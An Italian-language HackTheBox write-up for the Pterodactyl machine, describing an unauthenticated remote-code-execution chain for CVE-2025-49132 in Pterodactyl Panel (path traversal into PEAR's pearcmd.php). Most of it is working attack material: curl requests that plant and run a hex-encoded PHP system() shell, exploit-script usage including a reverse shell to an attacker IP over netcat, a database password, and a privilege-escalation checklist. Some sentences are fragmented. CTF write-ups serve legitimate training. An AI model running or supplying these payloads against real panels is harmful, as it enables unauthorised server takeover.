
Exploit per CVE-2025-49132 che colpisce Pterodactyl Panel, combinando path traversal con iniezione di comandi PEAR per esecuzione di codice remoto non autenticata. Include script bash e Python per esecuzione di comandi, reverse shell e guida all'escalation dei privilegi.
HTB Stagione 10 - Writeup della Macchina Pterodactyl
Target: Macchina HTB Pterodactyl (Difficoltà Media)
CVE: CVE-2025-49132
Gravità: Critica (CVSS 9.8)
Tipo di Attacco: Esecuzione Remota di Codice Non Autenticata
Affetto: Pannello Pterodactyl < v1.11.11
Questa catena di exploit combina:
L'endpoint /locales/locale.json del Pannello Pterodactyl consente l'attraversamento del percorso tramite il parametro locale:
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd
Questo può essere concatenato con pearcmd.php di PEAR per:
/tmpPEAR (PHP Extension and Application Repository) ha uno strumento CLI (pearcmd.php) che:
config-create che scrive fileLa Catena dell'Exploit:
Path Traversal → Load pearcmd.php → Inject PHP via config-create → Execute malicious PHP
I comandi sono codificati in esadecimale usando hex2bin() per bypassare:
Esempio:
Command: whoami
Hex: 77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>
Metodo 1: Usare exploit.sh fornito
chmod +x exploit.sh
# Get user flag
./exploit.sh flag
# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"
# Reverse shell
nc -lvnp 4444 # On attacker machine
./exploit.sh shell 10.10.14.21 4444
Metodo 2: Sfruttamento manuale
# Step 1: Write PHP shell (hex-encoded "whoami")
curl -g "http://panel.pterodactyl.htb/locales/locale.json?\
+config-create+/&\
locale=../../../../../../usr/share/php/PEAR&\
namespace=pearcmd&\
/<?=system(hex2bin('77686f616d69'))?>+/tmp/shell.php"
# Step 2: Execute
curl "http://panel.pterodactyl.htb/locales/locale.json?\
locale=../../../../../tmp&\
namespace=shell"
Metodo 3: Script Python
Ho aggiunto exploit.py
**Installa requests**
Exploit bash completo
./exploit.sh cmd "whoami" # Execute single command
./exploit.sh shell 10.10.14.21 4444 # Reverse shell
./exploit.sh flag # Find user flag
Caratteristiche:
Documentazione tecnica completa
Contiene:
# 1. Add to /etc/hosts
echo "10.10.x.x pterodactyl.htb panel.pterodactyl.htb" | sudo tee -a /etc/hosts
# 2. Download exploit
wget https://your-repo/exploit.sh
chmod +x exploit.sh
# 3. Get shell
nc -lvnp 4444 # Terminal 1
./exploit.sh shell 10.10.14.21 4444 # Terminal 2
# 4. Get user flag
cat /home/phileasfogg3/user.txt
# Check running services
ss -tlnp
# Found:
# 127.0.0.1:3306 - MySQL (root)
# 127.0.0.1:6379 - Redis
# 127.0.0.1:9000 - PHP-FPM (root)
# 127.0.0.1:25 - Postfix
# Check sudo
sudo -l
# (Likely requires password)
# SUID binaries
find / -perm -4000 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
mysql -u pterodactyl -pPteraPanel
# Check for UDF injection, file write perms
# Check for FPM exploitation (CVE-2019-11043 or config abuse)
# Check for auth bypass, RCE via cron
redis-cli -h 127.0.0.1
find /etc/cron* -writable 2>/dev/null
uname -a
# Check for DirtyCow, etc.